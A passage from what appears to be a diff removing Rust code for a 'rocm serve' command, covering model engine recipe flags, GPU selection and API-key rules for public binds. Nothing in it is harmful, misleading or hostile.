"platform default", - } -} - -fn model_recipe_supports_engine(recipe: &ModelRecipeRecord, engine: &str) -> bool { - recipe - .preferred_engines - .iter() - .any(|candidate| candidate.eq_ignore_ascii_case(engine)) - || recipe - .engine_recipes - .iter() - .any(|candidate| candidate.engine.eq_ignore_ascii_case(engine)) -} - -fn serve_model_ref_for_engine( - model: &str, - recipe: Option<&ModelRecipeRecord>, - selected_engine: &str, -) -> String { - let Some(recipe) = - recipe.filter(|recipe| model_recipe_supports_engine(recipe, selected_engine)) - else { - return model.to_owned(); - }; - if let Some(override_id) = recipe - .engine_recipes - .iter() - .find(|engine_recipe| engine_recipe.engine.eq_ignore_ascii_case(selected_engine)) - .and_then(|engine_recipe| engine_recipe.model_id_override.as_deref()) - .filter(|value| !value.trim().is_empty()) - { - return override_id.to_owned(); - } - recipe.canonical_model_id.clone() -} - -fn serve_engine_selection_line(selection: &ServeEngineSelection) -> String { - format!(" engine_selection: {}", selection.source) -} - -fn render_serve_engine_recipe_lines(engine_recipe: &EngineRecipeHint) -> String { - let mut output = String::new(); - let _ = writeln!( - output, - " engine_recipe_contract: {}", - engine_recipe.contract_version - ); - let _ = writeln!( - output, - " engine_recipe_policy: selected-engine required_flags are applied at launch; parser/endpoint metadata is forwarded to the adapter" - ); - let _ = writeln!(output, " engine_recipe_engine: {}", engine_recipe.engine); - if !engine_recipe.required_flags.is_empty() { - let _ = writeln!( - output, - " engine_recipe_required_flags: {}", - engine_recipe.required_flags.join(" ") - ); - } - output -} - -fn protocol_engine_recipe_hint( - recipe: &ModelRecipeRecord, - engine: &str, -) -> Option { - recipe - .engine_recipes - .iter() - .find(|engine_recipe| engine_recipe.engine == engine) - .map(|engine_recipe| EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: engine_recipe.engine.clone(), - required_flags: engine_recipe.required_flags.clone(), - parser_settings: engine_recipe.parser_settings.clone(), - preferred_endpoint: engine_recipe.preferred_endpoint.as_ref().map(|endpoint| { - EngineRecipeEndpointHint { - endpoint_mode: endpoint.endpoint_mode.clone(), - settings: endpoint.settings.clone(), - } - }), - unsupported_combinations: engine_recipe - .unsupported_combinations - .iter() - .map(|combination| EngineRecipeUnsupportedCombinationHint { - combination: combination.combination.clone(), - reason: combination.reason.clone(), - }) - .collect(), - notes: engine_recipe.notes.clone(), - }) -} - -/// Applies an explicit `--tool-call-parser` override to a vLLM engine recipe hint. -/// -/// The TUI chat tab always attaches tool definitions to non-streaming chat -/// requests (`tool_choice: "auto"`). vLLM rejects those with HTTP 400 unless it was -/// started with `--enable-auto-tool-choice` *and* a matching `--tool-call-parser`. -/// The correct parser is model-specific and vLLM does not auto-detect it, so it is -/// never guessed from the model ref: it comes either from authored catalog recipe -/// metadata (already carried in `required_flags`) or from the explicit -/// `--tool-call-parser` serve flag, which this applies. -/// -/// Only vLLM is affected. When an override is supplied it wins over any -/// recipe-authored parser (a single `--tool-call-parser`, no duplication) and a -/// minimal hint is synthesized when none exists (arbitrary HF repos, or a catalog -/// model forced onto a non-preferred engine). With no override the hint passes -/// through unchanged. -fn engine_recipe_with_tool_call_override( - engine: &str, - hint: Option, - tool_call_parser: Option<&str>, -) -> Option { - if !engine.eq_ignore_ascii_case("vllm") { - return hint; - } - let Some(parser) = tool_call_parser - .map(str::trim) - .filter(|value| !value.is_empty()) - else { - return hint; - }; - let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: engine.to_owned(), - ..EngineRecipeHint::default() - }); - set_vllm_tool_call_parser(&mut hint.required_flags, parser); - Some(hint) -} - -/// Sampling defaults a `rocm serve` invocation can push into a vLLM launch. -#[derive(Debug, Clone, Copy, Default, PartialEq)] -struct ServeGenerationDefaults { - temperature: Option, - top_p: Option, - max_tokens: Option, -} - -impl ServeGenerationDefaults { - const fn is_empty(&self) -> bool { - self.temperature.is_none() && self.top_p.is_none() && self.max_tokens.is_none() - } -} - -/// Applies `rocm serve` generation defaults (`--temperature`/`--top-p`/`--max-tokens`) -/// to the selected engine's launch recipe. -/// -/// vLLM `serve` has no raw `--temperature`/`--top-p` flags; `--override-generation-config` -/// is the supported way to set server-wide sampling defaults, so `--max-tokens` is -/// mapped onto vLLM's `max_new_tokens` output cap. Only supplied values are written, -/// and any values already carried by an authored recipe's -/// `--override-generation-config` are preserved (the CLI-supplied keys win). -/// -/// Lemonade's llama.cpp backend accepts the equivalent `--temperature`, `--top-p`, -/// and `--n-predict` launch flags. A minimal hint is synthesized when none exists. -/// With no defaults supplied the hint passes through unchanged. -fn engine_recipe_with_generation_defaults( - engine: &str, - hint: Option, - defaults: ServeGenerationDefaults, -) -> Result> { - if defaults.is_empty() { - return Ok(hint); - } - let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: engine.to_owned(), - ..EngineRecipeHint::default() - }); - if engine.eq_ignore_ascii_case("vllm") { - let mut overrides = serde_json::Map::new(); - if let Some(temperature) = defaults.temperature { - overrides.insert("temperature".to_owned(), serde_json::json!(temperature)); - } - if let Some(top_p) = defaults.top_p { - overrides.insert("top_p".to_owned(), serde_json::json!(top_p)); - } - if let Some(max_tokens) = defaults.max_tokens { - overrides.insert("max_new_tokens".to_owned(), serde_json::json!(max_tokens)); - } - set_vllm_override_generation_config(&mut hint.required_flags, &overrides); - } else if engine.eq_ignore_ascii_case("lemonade") { - set_lemonade_generation_defaults(&mut hint.required_flags, defaults); - } else { - bail!( - "generation defaults are not supported by engine `{engine}`; omit --temperature/--top-p/--max-tokens or select vllm/lemonade" - ); - } - Ok(Some(hint)) -} - -fn set_lemonade_generation_defaults(flags: &mut Vec, defaults: ServeGenerationDefaults) { - // Only touch a flag pair when the caller actually supplied that control — - // an unset field must leave any authored recipe value in place rather than - // deleting it, mirroring the vLLM merge semantics in - // `set_vllm_override_generation_config`. - for (name, value) in [ - ( - "--temperature", - defaults.temperature.map(|value| value.to_string()), - ), - ("--top-p", defaults.top_p.map(|value| value.to_string())), - ( - "--n-predict", - defaults.max_tokens.map(|value| value.to_string()), - ), - ] { - let Some(value) = value else { - continue; - }; - let mut rewritten = Vec::with_capacity(flags.len() + 2); - let mut skip_value = false; - for flag in std::mem::take(flags) { - if skip_value { - skip_value = false; - continue; - } - if flag == name { - skip_value = true; - } else { - rewritten.push(flag); - } - } - rewritten.extend([name.to_owned(), value]); - *flags = rewritten; - } -} - -/// Rewrites `flags` so vLLM's `--override-generation-config` carries exactly one -/// merged JSON object: any existing `--override-generation-config ` pair is -/// removed, its keys are used as a base, and `overrides` are layered on top (CLI -/// values win). Emits a single flag pair with the merged, stably-ordered config. -fn set_vllm_override_generation_config( - flags: &mut Vec, - overrides: &serde_json::Map, -) { - let existing = std::mem::take(flags); - let mut rewritten: Vec = Vec::with_capacity(existing.len() + 2); - let mut merged = serde_json::Map::new(); - let mut take_value = false; - for flag in existing { - if take_value { - take_value = false; - if let Ok(serde_json::Value::Object(existing_config)) = - serde_json::from_str::(&flag) - { - for (key, value) in existing_config { - merged.insert(key, value); - } - } else { - eprintln!( - "warning: existing --override-generation-config value is not valid JSON; discarding it" - ); - } - continue; - } - if flag == "--override-generation-config" { - take_value = true; - continue; - } - rewritten.push(flag); - } - for (key, value) in overrides { - merged.insert(key.clone(), value.clone()); - } - rewritten.push("--override-generation-config".to_owned()); - rewritten.push(serde_json::Value::Object(merged).to_string()); - *flags = rewritten; -} - -/// Rewrites `flags` so vLLM tool calling uses exactly `parser`: drops any existing -/// `--tool-call-parser ` pair, ensures `--enable-auto-tool-choice` is -/// present, then appends the new parser flag. -fn set_vllm_tool_call_parser(flags: &mut Vec, parser: &str) { - let existing = std::mem::take(flags); - let mut rewritten: Vec = Vec::with_capacity(existing.len() + 3); - let mut skip_value = false; - for flag in existing { - if skip_value { - // Drop the value that followed the removed `--tool-call-parser`. - skip_value = false; - continue; - } - if flag == "--tool-call-parser" { - skip_value = true; - continue; - } - rewritten.push(flag); - } - if !rewritten - .iter() - .any(|flag| flag == "--enable-auto-tool-choice") - { - rewritten.push("--enable-auto-tool-choice".to_owned()); - } - rewritten.push("--tool-call-parser".to_owned()); - rewritten.push(parser.to_owned()); - *flags = rewritten; -} - -/// Applies an explicit `--gpu-memory-utilization` to the vLLM engine recipe. -/// -/// rocm-cli intentionally ships no default for this: vLLM sizes its KV cache as -/// a fraction of the device's TOTAL VRAM, and any number rocm-cli picked would -/// silently override upstream's and drift from it. So the flag is passed through -/// only when the user asked for one, via `required_flags` (the same channel the -/// `--tool-call-parser` override uses — no protocol change needed). -/// -/// Only vLLM is affected. An explicit value wins over any recipe-authored one, -/// and a minimal hint is synthesized when none exists. -fn engine_recipe_with_gpu_memory_utilization_override( - engine: &str, - hint: Option, - gpu_memory_utilization: Option, -) -> Option { - if !engine.eq_ignore_ascii_case("vllm") { - return hint; - } - let Some(value) = gpu_memory_utilization else { - return hint; - }; - let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: engine.to_owned(), - ..EngineRecipeHint::default() - }); - set_vllm_gpu_memory_utilization(&mut hint.required_flags, value); - Some(hint) -} - -/// Rewrites `flags` so vLLM receives exactly one `--gpu-memory-utilization -/// ` pair: drops any existing pair, then appends the new one. -fn set_vllm_gpu_memory_utilization(flags: &mut Vec, value: f64) { - let existing = std::mem::take(flags); - let mut rewritten: Vec = Vec::with_capacity(existing.len() + 2); - let mut skip_value = false; - for flag in existing { - if skip_value { - // Drop the value that followed the removed flag. - skip_value = false; - continue; - } - if flag == "--gpu-memory-utilization" { - skip_value = true; - continue; - } - rewritten.push(flag); - } - rewritten.push("--gpu-memory-utilization".to_owned()); - rewritten.push(format!("{value}")); - *flags = rewritten; -} - -/// Parse `rocm serve --gpu-memory-utilization`. Unlike the env-var overrides -/// elsewhere in this file, an explicit CLI value is never silently ignored: a -/// user who types a bad fraction is told so. -fn parse_gpu_memory_utilization(value: Option<&str>) -> Result> { - let Some(raw) = value else { - return Ok(None); - }; - let trimmed = raw.trim(); - let parsed: f64 = trimmed.parse().map_err(|_| { - anyhow::anyhow!( - "--gpu-memory-utilization expects a fraction greater than 0 and at most 1 \ - (e.g. 0.5); got `{trimmed}`" - ) - })?; - if !parsed.is_finite() || parsed <= 0.0 || parsed > 1.0 { - bail!( - "--gpu-memory-utilization must be greater than 0 and at most 1 (a fraction of \ - the GPU's TOTAL VRAM, e.g. 0.5); got `{trimmed}`" - ); - } - Ok(Some(parsed)) -} - -/// Whether the resolved engine recipe launches vLLM with tool calling enabled. -fn engine_recipe_enables_tool_choice(hint: Option<&EngineRecipeHint>) -> bool { - hint.is_some_and(|hint| { - hint.required_flags - .iter() - .any(|flag| flag == "--enable-auto-tool-choice") - }) -} - -/// Parsed `rocm serve` arguments. Grouped into a struct to keep the dispatcher -/// and `serve()` readable now that the verb carries verbose/smoke-test controls. -struct ServeArgs { - model: String, - engine: Option, - device: Option, - gpu: Option, - runtime_id: Option, - env_id: Option, - host: String, - port: u16, - foreground: bool, - managed: bool, - verbose: bool, - no_smoke_test: bool, - allow_public_bind: bool, - require_api_key: bool, - tool_call_parser: Option, - gpu_memory_utilization: Option, - temperature: Option, - top_p: Option, - max_tokens: Option, - api_key: Option, -} - -fn serve(args: ServeArgs) -> Result<()> { - let ServeArgs { - model, - engine, - device, - gpu, - runtime_id, - env_id, - host, - port, - foreground, - managed, - verbose, - no_smoke_test, - allow_public_bind, - require_api_key, - tool_call_parser, - gpu_memory_utilization, - temperature, - top_p, - max_tokens, - api_key, - } = args; - let _ = managed; // background is now the default; --managed is accepted as an explicit synonym. - validate_bind_host(&host, allow_public_bind)?; - // Loopback stays credential-free; a public bind must be authenticated. Resolve - // (or generate) the endpoint key now so every downstream path — engine spawn, - // readiness probe, smoke test, and the client-config we print — shares one value. - // The `--api-key` flag wins; otherwise fall back to `ROCM_SERVE_API_KEY` (read - // here rather than via clap's `env` so it works without clap's `env` feature). - let supplied_key = api_key.or_else(|| { - std::env::var("ROCM_SERVE_API_KEY") - .ok() - .filter(|value| !value.trim().is_empty()) - }); - let endpoint_auth = resolve_endpoint_auth(&host, supplied_key.as_deref(), require_api_key)?; - let paths = AppPaths::discover()?; - let mut config = RocmCliConfig::load(&paths)?; - // Host GPU detection can involve sysfs/WSL probing, so only run it when engine - // selection would actually consult it: no explicit `--engine` and no non-empty - // configured `default_engine`. - let host_gpu_summary = if engine - .as_deref() - .is_some_and(|value| !value.trim().is_empty()) - || config - .default_engine - .as_deref() - .is_some_and(|value| !value.trim().is_empty()) - { - None - } else { - Some(detect_host_gpu_summary(Some(&paths))) - }; - let shared_recipe = resolve_model_recipe(&model)?; - let serve_engine = select_serve_engine( - engine.as_deref(), - config.default_engine.as_deref(), - shared_recipe.as_ref(), - host_gpu_summary.as_ref(), - ); - let selected_engine = serve_engine.engine.clone(); - // Fail closed: a public bind must be authenticated, but Windows managed - // Lemonade cannot receive the key (see `ensure_public_bind_engine_supported`), - // so refuse rather than launch an open public server. - ensure_public_bind_engine_supported(&selected_engine, endpoint_auth.is_some(), cfg!(windows))?; - let engine_model_ref = - serve_model_ref_for_engine(&model, shared_recipe.as_ref(), &selected_engine); - let recipe_hint = shared_recipe - .as_ref() - .filter(|recipe| model_recipe_supports_engine(recipe, &selected_engine)) - .and_then(|recipe| protocol_engine_recipe_hint(recipe, &selected_engine)); - // vLLM rejects the TUI chat tab's tool-bearing requests with HTTP 400 unless it - // is launched with `--enable-auto-tool-choice`/`--tool-call-parser`. The parser - // is model-specific and vLLM does not auto-detect it, so it is never guessed: it - // comes from authored catalog recipe metadata or an explicit `--tool-call-parser` - // override, applied here for vLLM only. - let engine_serves_vllm = selected_engine.eq_ignore_ascii_case("vllm"); - let engine_recipe = engine_recipe_with_tool_call_override( - &selected_engine, - recipe_hint, - tool_call_parser.as_deref(), - ); - // Validated before anything is launched so a typo fails immediately rather - // than surfacing as a vLLM argparse error deep in the engine log. - let gpu_memory_utilization = parse_gpu_memory_utilization(gpu_memory_utilization.as_deref())?; - let engine_recipe = engine_recipe_with_gpu_memory_utilization_override( - &selected_engine, - engine_recipe, - gpu_memory_utilization, - ); - // Stored without a `note:` prefix so it can feed both output paths: the plan - // path adds the prefix inline, the interactive summary adds it when rendering. - let gpu_memory_utilization_note = (gpu_memory_utilization.is_some() && !engine_serves_vllm) - .then(|| { - format!( - "--gpu-memory-utilization applies only to vLLM; ignored for engine '{selected_engine}'" - ) - }); - // Translate the engine-neutral CLI controls into each adapter's server-wide - // defaults: vLLM generation config or Lemonade llama.cpp launch flags. - let generation_defaults = ServeGenerationDefaults { - temperature, - top_p, - max_tokens, - }; - let engine_recipe = engine_recipe_with_generation_defaults( - &selected_engine, - engine_recipe, - generation_defaults, - )?; - let tool_call_note = if tool_call_parser.is_some() && !engine_serves_vllm { - Some(format!( - "note: --tool-call-parser applies only to vLLM; ignored for engine '{selected_engine}'" - )) - } else if engine_serves_vllm && !engine_recipe_enables_tool_choice(engine_recipe.as_ref()) { - Some( - "note: tool calling is disabled for this model; pass `--tool-call-parser ` (e.g. hermes, llama3_json, mistral) to enable it".to_owned(), - ) - } else { - None - }; - let device_policy = parse_device_policy(device.as_ref().map(|policy| policy.as_policy_str()))?; - let gpu_selection = parse_gpu_selection(gpu.as_deref())?; - // CPU-only serving never pins a GPU, so skip GPU resolution entirely and - // surface the explicit `--gpu` as ignored rather than printing a device the - // server will not use. - let cpu_only = matches!(device_policy, DevicePolicy::CpuOnly); - // AMD GPU ordinals still usable after the active visibility mask - // (`HIP_VISIBLE_DEVICES`, then `ROCR_VISIBLE_DEVICES`) is applied, in HIP - // ordinal space — the space `--gpu` is validated and exported through. A - // `ROCR_VISIBLE_DEVICES` mask hides devices below HIP, which re-indexes the - // survivors as `0..N`, so those HIP positions are what comes back here, not the - // physical ROCR token values. `None` means availability could not be probed - // (a non-Linux target, both KFD and DRM unreadable on Linux, or a mask this - // ordinal-only probe cannot interpret such as one naming UUIDs) — NOT WSL, - // which answers authoritatively via `detect_wsl_summary`. On `None` selection - // stays permissive and defers device validation to the engine. An empty set is - // the authoritative "no usable GPU", not "unknown". Computed once and reused - // for the fail-fast check below and for mask-aware GPU selection, so serve - // never auto-selects — or accepts an explicit `--gpu` for — a hidden device. - let visible_gpu_indices = if cpu_only { - None - } else { - rocm_core::usable_amd_gpu_indices() - }; - // Fail fast under a GPU-required policy when the host has no usable AMD GPU, - // BEFORE preparing or launching any engine (no wasted engine download, and an - // actionable message instead of a late engine crash). The engine enforces the - // same rule as a backstop. Skipped for cpu_only; permissive when availability - // cannot be probed on this platform (probe returns `None`). The E2E-only - // backend-failure scenario bypasses this host precondition so the black-box - // test reaches Lemonade's backend boundary without real GPU hardware. - let scripted_backend_failure = cfg!(feature = "e2e-test-hooks") - && std::env::var_os("ROCM_E2E_LEMONADE_BACKEND_INSTALL_FAILURE").is_some(); - if !cpu_only - && !scripted_backend_failure - && let Some(usable) = visible_gpu_indices.as_deref() - && usable.is_empty() - { - bail!( - "no usable AMD GPU detected; `rocm serve` requires a GPU under the {policy} \ - policy and does not fall back to CPU. Check the driver with `rocm examine`, \ - confirm /dev/kfd is present, and ensure HIP_VISIBLE_DEVICES / \ - ROCR_VISIBLE_DEVICES are not masking every device.", - policy = device_policy_name(&device_policy) - ); - } - // `--gpu` selects by the amd-smi `gpu` ordinal but is exported via - // `HIP_VISIBLE_DEVICES`; those orderings can diverge when - // `ROCR_VISIBLE_DEVICES`/partitioning is in play, so warn at serve time. - let rocr_visible_devices_set = std::env::var_os("ROCR_VISIBLE_DEVICES").is_some(); - // Whether *any* visibility mask is active. The visible set alone cannot say: - // with no mask it is just `0..present`, indistinguishable from a HIP mask - // that happens to list the low ordinals. `validate_pinned_gpu_index` uses - // this only to word its rejection — "under the active visibility mask" when a - // mask is set, "not present on this host" when none is — so an out-of-range - // `--gpu` on an unmasked host is not blamed on a mask the user never set. - let visibility_mask_active = - rocr_visible_devices_set || std::env::var_os("HIP_VISIBLE_DEVICES").is_some(); - let gpu_vram = if cpu_only { None } else { gpu_vram_usage() }; - // Validate an explicit `--gpu ` up front — before engine/runtime - // resolution — so an out-of-range or masked-out ordinal produces a - // GPU-specific refusal even when no ROCm runtime is configured. Otherwise the - // "no active ROCm runtime is configured" bail-out below pre-empts it and the - // user sees a generic runtime error for what is really a bad `--gpu` value. - // This is pure validation (no service-state read), so it needs no lock; - // `--gpu auto` reads live busy-GPU state and stays under `launch_lock` below. - let pinned_gpu_indices = if !cpu_only && let GpuSelection::Index(index) = &gpu_selection { - Some(validate_pinned_gpu_index( - *index, - detect_gpu_count(), - visible_gpu_indices.as_deref(), - visibility_mask_active, - )?) - } else { - None - }; - let resolved_selection = resolve_engine_selection( - &config, - &selected_engine, - runtime_id.as_deref(), - env_id.as_deref(), - ); - let resolved_selection = validate_engine_selection_runtime(&paths, resolved_selection)?; - if !matches!(device_policy, DevicePolicy::CpuOnly) - && resolved_selection.runtime_id.is_none() - && resolved_selection.env_id.is_none() - && !engine_manages_own_runtime(&selected_engine) - { - bail!( - "device_policy: {}; no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id/--env-id", - device_policy_name(&device_policy) - ); - } - if !matches!(device_policy, DevicePolicy::CpuOnly) - && engine_manages_own_runtime(&selected_engine) - { - ensure_self_managed_engine_ready(&paths, &mut config, &selected_engine)?; - } - let resolve = engine_request::<_, ResolveModelResponse>( - Some(&paths), - &selected_engine, - EngineMethod::ResolveModel, - &ResolveModelRequest { - model_ref: engine_model_ref, - runtime_id: resolved_selection.runtime_id.clone(), - device_policy: Some(device_policy), - recipe_override: None, - engine_recipe, - }, - )?; - // Serialize GPU auto-selection with the managed-service claim: the busy-GPU - // read and the claiming record write inside `spawn_managed_engine_child` must - // be atomic, or two concurrent `rocm serve --gpu auto` can both read the same - // GPU as free and launch on it. Taken here — after engine resolution, - // self-managed runtime prep, and the `ResolveModel` RPC have all completed - // unlocked — so a slow first-use install (e.g. the Lemonade embeddable - // download/extract) never blocks an unrelated serve. - let (gpu_indices, launch_lock) = select_gpu_indices_under_launch_lock( - &paths, - cpu_only, - pinned_gpu_indices, - detect_gpu_count, - visible_gpu_indices.as_deref(), - gpu_vram.as_deref(), - )?; - let service_id = generate_service_id(&selected_engine, &resolve.canonical_model_id); - - // Attached foreground streaming is the debugging path, selected by `--verbose` - // or `--foreground`. Everything else backgrounds the server and, when writing - // to an interactive terminal, shows a progress spinner + deployment summary - // instead of a raw log stream. Piped/captured output (CI, the chat assistant) - // keeps the plain line-by-line form. - let use_foreground = foreground || verbose; - let background = !use_foreground; - let summary_mode = background && std::io::IsTerminal::is_terminal(&std::io::stdout()); - - if !summary_mode { - println!("serve plan"); - println!(" requested model: {model}"); - println!(" resolved model: {}", resolve.canonical_model_id); - println!(" engine: {selected_engine}"); - println!("{}", serve_engine_selection_line(&serve_engine)); - println!(" host: {host}"); - println!(" port: {port}"); - if let Some(runtime_id) = resolved_selection.runtime_id.as_deref() { - println!(" runtime_id: {runtime_id}"); - } - if let Some(env_id) = resolved_selection.env_id.as_deref() { - println!(" env_id: {env_id}"); - } - if let Some(source) = resolved_selection.source.as_deref() { - println!(" selection_source: {source}"); - } - println!( - " device_policy: {}", - device_policy_name(&resolve.device_policy) - ); - if cpu_only { - if matches!(gpu_selection, GpuSelection::Index(_)) { - println!( - " warning: --gpu was ignored because --device cpu_only runs the model on CPU" - ); - } - } else { - match &gpu_selection { - GpuSelection::Auto => { - let csv = rocm_engine_protocol::gpu_indices_to_csv(&gpu_indices) - .unwrap_or_else(|| "none".to_owned()); - println!(" gpu: auto (selected {csv})"); - } - GpuSelection::Index(_) => { - let csv = rocm_engine_protocol::gpu_indices_to_csv(&gpu_indices) - .unwrap_or_else(|| "none".to_owned()); - println!(" gpu: {csv}"); - } - } - if rocr_visible_devices_set { - println!( - " warning: ROCR_VISIBLE_DEVICES is set; the selected amd-smi ordinal is exported \ - via HIP_VISIBLE_DEVICES, which the runtime interprets relative to the \ - ROCR-visible set, so the device the engine binds may differ. Verify the \ - selected GPU or unset ROCR_VISIBLE_DEVICES." - ); - } - if let Some(warning) = serve_gpu_low_memory_warning( - &gpu_indices, - gpu_vram.as_deref(), - host_gpu_summary.as_ref(), - ) { - println!(" {warning}"); - if engine_serves_vllm { - println!(" note: {}", rocm_core::VLLM_GPU_MEMORY_UTILIZATION_HINT); - } - } - } - if let Some(engine_recipe) = &resolve.engine_recipe { - print!("{}", render_serve_engine_recipe_lines(engine_recipe)); - } - if let Some(note) = &tool_call_note { - println!(" {note}"); - } - if let Some(note) = &gpu_memory_utilization_note { - println!(" note: {note}"); - } - } - - let managed_runtime_id = resolved_selection.runtime_id.clone(); - let managed_env_id = resolved_selection.env_id.clone(); - - // Persist the endpoint key (public bind only) in a 0600 file so the engine - // child, the restart/recovery path, and inspection commands can retrieve it by - // service id. Loopback binds resolve to `None` and store nothing. - if let Some(key) = endpoint_auth.as_deref() { - endpoint_keys::store_endpoint_api_key(&paths, &service_id, key)?; - } - - if background { - let mut spinner = - cli_progress::Spinner::new(format!("Starting {model} on {selected_engine}…")); - spinner.tick(); - let report = start_managed_service( - &selected_engine, - &service_id, - &model, - &resolve, - &host, - port, - &resolve.device_policy, - &gpu_indices, - managed_runtime_id.as_deref(), - managed_env_id.as_deref(), - resolve.engine_recipe.as_ref(), - endpoint_auth.as_deref(), - launch_lock, - require_api_key, - &mut |_elapsed| spinner.tick(), - )?; - ensure_background_helper_running_quiet(summary_mode)?; - - // An equivalent service was already running, so nothing was spawned and the - // freshly generated key is unused — drop it rather than leave it orphaned in - // storage. The existing service keeps its own key. - if report.already_running { - drop_orphaned_endpoint_key_on_already_running( - &paths, - &service_id, - endpoint_auth.as_deref(), - ); - } - // Safe to move `endpoint_auth` here: this branch always returns, so the - // fall-through (attached) path below never observes it moved. - let launched_key = if report.already_running { - None - } else { - endpoint_auth - }; - - if summary_mode { - // Best-effort inference smoke test, on by default (opt out with - // `--no-smoke-test`). Only meaningful for a freshly-ready server we - // just launched; skipped when metrics could not be shown anyway. - let metrics = if !no_smoke_test && !report.already_running && report.status == "ready" { - spinner.set_label("Running smoke test…"); - // The local provider resolves the endpoint key from the per-service - // 0600 key file by service id, so the smoke test authenticates - // against a protected public endpoint without threading the secret - // through here. - serve_summary::run_smoke_test(&paths, &resolve.canonical_model_id) - } else { - serve_summary::SmokeMetrics::default() - }; - spinner.clear(); - - let notes = collect_serve_notes( - cpu_only, - &gpu_selection, - rocr_visible_devices_set, - &gpu_indices, - gpu_vram.as_deref(), - gpu_memory_utilization_note.as_deref(), - host_gpu_summary.as_ref(), - engine_serves_vllm, - ); - let summary = serve_summary::DeploymentSummary { - engine: selected_engine.clone(), - requested_model: model, - api_model: resolve.canonical_model_id, - chat_endpoint: format!("{}/chat/completions", report.endpoint_url), - service_id: report.service_id.clone(), - status: report.status.clone(), - already_running: report.already_running, - metrics, - api_key: launched_key, - notes, - }; - print!("{}", serve_summary::render_summary(&summary)); - } else { - spinner.clear(); - print_managed_launch_plain(&report, launched_key.as_deref()); - } - return Ok(()); - } - - run_attached_service( - &selected_engine, - &service_id, - &model, - &resolve, - &host, - port, - &gpu_indices, - resolved_selection.runtime_id.as_deref(), - resolved_selection.env_id.as_deref(), - endpoint_auth.as_deref(), - launch_lock, - require_api_key, - ) -} - -/// GPU/device warnings folded into the interactive deployment summary. Mirrors the -/// inline warnings printed in the plain serve plan, in the same order. -#[allow(clippy::too_many_arguments)] -fn collect_serve_notes( - cpu_only: bool, - gpu_selection: &GpuSelection, - rocr_visible_devices_set: bool, - gpu_indices: &[u32], - gpu_vram: Option<&[GpuVramUsage]>, - engine_flag_note: Option<&str>, - host_gpu_summary: Option<&rocm_core::HostGpuSummary>, - engine_is_vllm: bool, -) -> Vec { - let mut notes = Vec::new(); - // An engine-scoped flag the selected engine cannot honor must be reported here - // too: the summary path is what an interactive `rocm serve` actually prints, so - // a note only emitted on the plan path would never reach that user. - if let Some(note) = engine_flag_note { - notes.push(note.to_owned()); - } - if cpu_only { - if matches!(gpu_selection, GpuSelection::Index(_)) { - notes.push( - "--gpu was ignored because --device cpu_only runs the model on CPU".to_owned(), - ); - } - } else { - if rocr_visible_devices_set { - notes.push( - "ROCR_VISIBLE_DEVICES is set; the selected amd-smi ordinal is exported via \ - HIP_VISIBLE_DEVICES, which the runtime interprets relative to the ROCR-visible \ - set, so the device the engine binds may differ. Verify the selected GPU or unset \ - ROCR_VISIBLE_DEVICES." - .to_owned(), - ); - } - if let Some(warning) = serve_gpu_low_memory_warning(gpu_indices, gpu_vram, host_gpu_summary) - { - notes.push(warning); - // vLLM's total-VRAM reservation is what turns a busy card into an OOM; - // pair the generic warning with the concrete knob that avoids it. - if engine_is_vllm { - notes.push(rocm_core::VLLM_GPU_MEMORY_UTILIZATION_HINT.to_owned()); - } - } - } - notes -} - -fn validate_bind_host(host: &str, allow_public_bind: bool) -> Result<()> { - if !is_loopback_host(host) && !allow_public_bind { - bail!( - "`rocm serve --host {host}` is not loopback; pass `--allow-public-bind` before binding a non-local interface" - ); - } - Ok(()) -} - -/// Inverse of [`rocm_engine_protocol::is_public_bind_host`], which owns the -/// policy so `rocmd` classifies a recorded `host` identically when it respawns -/// the service. -fn is_loopback_host(host: &str) -> bool { - !rocm_engine_protocol::is_public_bind_host(host) -} - -/// Resolve the API key that will guard this endpoint, applying the -/// loopback-vs-public policy for `rocm serve`. -/// -/// - **Loopback host** → `None`: local serving stays credential-free (the -/// unchanged default). Any key supplied for a loopback bind is ignored and -/// nothing is persisted — loopback needs no auth. -/// - **Public host** → `Some(key)`: use the user-supplied key when present, -/// otherwise generate a strong random one so a public endpoint can never come -/// up anonymous. An empty/whitespace supplied key is rejected rather than -/// silently treated as "no auth". -/// - **`required`** → treat a loopback bind as public for this purpose. -/// -/// That last case exists because "loopback" is a statement about the bind -/// address, not about who can reach the port. Publishing the port onto a -/// tailnet, proxying it, or mapping it out of a container all leave the bind -/// loopback while widening the audience — and the policy above would then hand -/// out an unauthenticated endpoint. Whoever widens the reach is responsible for -/// asking for the credential, so this is an explicit flag rather than a guess. -fn resolve_endpoint_auth( - host: &str, - supplied: Option<&str>, - required: bool, -) -> Result> { - if is_loopback_host(host) && !required { - return Ok(None); - } - match supplied { - Some(raw) => { - let trimmed = raw.trim(); - if trimmed.is_empty() { - bail!( - "`rocm serve --api-key` (or ROCM_SERVE_API_KEY) was empty; a public \ - endpoint must be protected by a non-empty API key" - ); - } - // The key is later interpolated verbatim into raw `Authorization: - // Bearer {key}\r\n` header lines; reject a control character (e.g. an - // embedded CR/LF) here so a crafted key cannot inject extra headers. - if rocm_core::endpoint_api_key_has_forbidden_chars(trimmed) { - bail!( - "`rocm serve --api-key` (or ROCM_SERVE_API_KEY) contained a control \ - character such as a carriage return or newline; an endpoint API key \ - must be a single line of printable characters" - ); - } - Ok(Some(trimmed.to_owned())) - } - None => Ok(Some(rocm_core::generate_endpoint_api_key())), - } -} - -/// When an equivalent managed service is already running, the endpoint key -/// serve() freshly stored for this attempt is unused — drop it so it is not -/// orphaned in storage. The already-running service keeps its own key. -/// Best-effort and idempotent; a loopback attempt (`freshly_stored == None`) -/// is a no-op. -fn drop_orphaned_endpoint_key_on_already_running( - paths: &AppPaths, - service_id: &str, - freshly_stored: Option<&str>, -) { - if freshly_stored.is_some() { - endpoint_keys::clear_endpoint_api_key(paths, service_id); - } -} - -/// Reject engine/platform combinations that cannot enforce a public endpoint's -/// API key, so a public bind fails closed instead of coming up unauthenticated. -/// -/// The one such case today: Windows managed Lemonade. Its server reads the 